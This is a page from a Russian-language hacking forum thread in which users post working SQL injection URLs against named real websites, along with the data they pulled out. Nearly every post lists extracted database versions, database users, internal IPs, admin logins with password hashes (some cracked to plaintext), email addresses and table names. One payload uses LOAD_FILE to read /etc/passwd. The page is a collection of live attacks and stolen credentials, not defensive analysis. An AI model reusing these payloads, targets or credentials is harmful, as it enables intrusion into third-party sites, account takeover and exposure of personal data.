ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9591  
Старый 31.05.2009, 11:52
Аватар для AlexSatter
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://renterbase.com/index.php?user=daysbooking&pid=3+and+substring(ver sion(),1,1)=4
------
http://stluciaexclusive.com/index.php?user=page&id=1+and+substring(version(),1 ,1)=4
------
http://www.hexxor.com/index.php?user=det&pid=16+and+substring(version(), 1,1)=4

ну и так далее, движок одинаковый...
-----
http://belmagazin.com/news/arhive.php?id_groups=1+and+substring(version(),1,1 )=4
-----
http://www.kam-pod.net/panorama_list_image.php?id=-63+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6/*

4.1.22-standard-log:kampod_kampod@localhost:kampod_kam

-----
http://meatbusiness.ua/article.php?p=-499+union+select+11111111,version()
5.0.67-community-log

http://meatbusiness.ua/article.php?p=-499+union+select+11111111,count(*)+from+users
274 записи/юзеров

p.s. вывод - title
 
Ответить с цитированием

  #9592  
Старый 31.05.2009, 12:31
Аватар для DezMond™
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://avvakul.ru/?id=9&p=1&pid=-2+union+select+1,concat_ws(0x3a3a,user_id,username ,user_password,user_session_page,user_session_topi c,user_level,user_login_tries,user_last_login_try) ,3,4,5+from+phpbb_users+--+
shade1387::cb2d5ae1e34ef450ea7aaf43afa29303::-4::0::0 - 4502388786

http://www.bitterlawyer.com/index.php/webisodes/?id=-1'+union+select+1,2,3,4,password,6,7,8,9,10,11,12, 13,14,15,16+from+exp_members+/*+
c398d9caa649d574539fdeb11cdc1a6359094c8d

http://www.manicureland.com/index.php?id=1&subid=4&tm=-45+union+select+database()+--+
manicureland

Последний раз редактировалось DezMond™; 31.05.2009 в 12:42..
 
Ответить с цитированием

  #9593  
Старый 31.05.2009, 12:59
Аватар для AlexSatter
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.alekseyvorobjev-fan.ru/news/arhive.php?lang=0+and+substring(version(),1,1)=4


http://feli.ru/news/arhive.php?a_y=2009&a_m=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,

8,9,10,11,12,13,14,15,16,17--

5.0.67-log:u32254@10.10.223.204:u32254

http://feli.ru/news/arhive.php?a_y=2009&a_m=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17+from+

information_schema.tables--
 
Ответить с цитированием

  #9594  
Старый 31.05.2009, 17:42
Аватар для farex
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

<<АРОМАТЕРАПИЯ>>
Код:
http://www.aroma.od.ua/stat/14/85+union+select+1,2,concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os),4,5,6,7--+.html
Код:
http://www.aroma.od.ua/admin/ - бейсик авторизация
5.0.51a-24+lenny1-log:*:aromaPgh:*:u_aromaPgh@localhost:*:debian-linux-gnu
 
Ответить с цитированием

  #9595  
Старый 31.05.2009, 17:45
Аватар для M0t0rist
M0t0rist
Новичок
Регистрация: 07.04.2008
Сообщений: 10
Провел на форуме:
455539

Репутация: 43
Отправить сообщение для M0t0rist с помощью ICQ
По умолчанию

Просто интересная скуль:
http://www.macca.org.af/file.php?id=-10+union+select+1,2,version(),4,5,6
 
Ответить с цитированием

  #9596  
Старый 31.05.2009, 18:09
Аватар для AlexSatter
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.e-meter.info/index.php?id=-245+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4
4.1.20-log:e-meter2@app9.visti.net:e-meter2
-------
Глонасс/ГНСС Форум
http://www.aggf.ru/press/press.php?num_news=-501+union+select+1,2,3,4,concat_Ws(0x3a,version(), user(),database()),6,

7,8,9,10,11,12,13,14

4.1.22-log:aggf2008_mysql@10.1.49.35:aggf2008_db

дырявое, такое же как и сам глонас

-------

http://www.actingmidwest.com/index.php?option=com_jvideo&view=user&user_id=62+a nd+1=2+union+select+concat(username,0

x3a,password)+from+jos_users

BobCooke:4bae163285ec75527488e23efba7271f
------

http://www.thefranksfam.com/index.php?option=com_jvideo&view=user&user_id=68+a nd+1=2+union+select+concat(username,0x

3a,password)+from+jos_users

admin:5c18bfa56a0576f3e5838f407714c7b6

-------
http://www.gallowayfullgospel.com/christ/index.php?option=com_jvideo&view=user&user_id=64+a nd+1=2+union+select+conca

t(username,0x3a,password)+from+jos_users

admin:6c86fdabb5223ba007eb6f8d616907a1

-------
http://kuqeblu.com/index.php?option=com_jvideo&view=user&user_id=62+a nd+1=2+union+select+concat(username,0x3a,passwo

rd)+from+jos_users

admin:54c250cc5c2a9b97ce06a65cd7931cef
 
Ответить с цитированием

  #9597  
Старый 31.05.2009, 18:52
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.kon-art.ro/items.php?id_scat=23&id_clasa=124+AND+SUBSTRING(ve rsion(),1,1)=4/*


Version: 4.1.14
Database :konart
User: konart@localhost
Os: pc-linux-gnu
 
Ответить с цитированием

  #9598  
Старый 31.05.2009, 19:07
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

PR 0
Код:
http://endven.sapnagroup.net/index/news.php?id=-20+union+select+1,2,3,4,5,6--
5.0.32-Debian_7etch6-log
Login:staff
E-mail: jonny@sapnagroup.net
Pass:05c5997cf4850ae282cfd61e03cc648d :eleph8nt


PR 4
Код:
http://www.photohobby.net/webboard/news.php?id=-20+union+select+1,2,3,4,5,6--
5.0.51a-community-log
Table: user
Columns : usr_password,usr_name, email
--
Table 2: webboard_member
Columns: user, passw, email


PR 3
Код:
http://www.goldenformula.net/news.php?id=-20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
4.1.22-log

PR 1
Код:
http://www.razom.sebastopol.ua/news.php?id=-20+union+select+1,2,3,4,5,6,7,8,9,10--
5.0.67-community
Pass: poddubny
E-mail: admin@razom.sebastopol.ua
 
Ответить с цитированием

  #9599  
Старый 31.05.2009, 22:58
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

ajlopez.net
Код:
http://ajlopez.net/Tema.php?Id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12/*
ajlopez_jlopez@localhost:ajlopez_lopez:4.1.22-standard

centrodeapoyoapa.org
Код:
http://www.centrodeapoyoapa.org/articulos/tema.php?id=-1+union+select+concat_ws(0x3a,user(),database(),version())/*
centrodeapoyoapa@localhost:centrodeapoyoapa:4.1.20

infonomia.com
Код:
http://www.infonomia.com/if/articulo.php?id=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,user(),database(),version()))),4,5,6,7,8,9,10,11,12&if=59
bernat@localhost:infonomia:4.1.11-Debian_4sarge7-log

/etc/passwd
Код:
http://www.infonomia.com/if/articulo.php?id=-1+union+select+1,2,LOAD_FILE(0x2F6574632F706173737764),4,5,6,7,8,9,10,11,12&if=59

Последний раз редактировалось mailbrush; 31.05.2009 в 23:11..
 
Ответить с цитированием

  #9600  
Старый 31.05.2009, 23:54
Аватар для AlexSatter
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://club66pro.co.uk/berita.php?view=detail&id=-11+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11

5.0.67:billco_club66pro@mysql4.floridaserver.com:b illco_club66pro
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ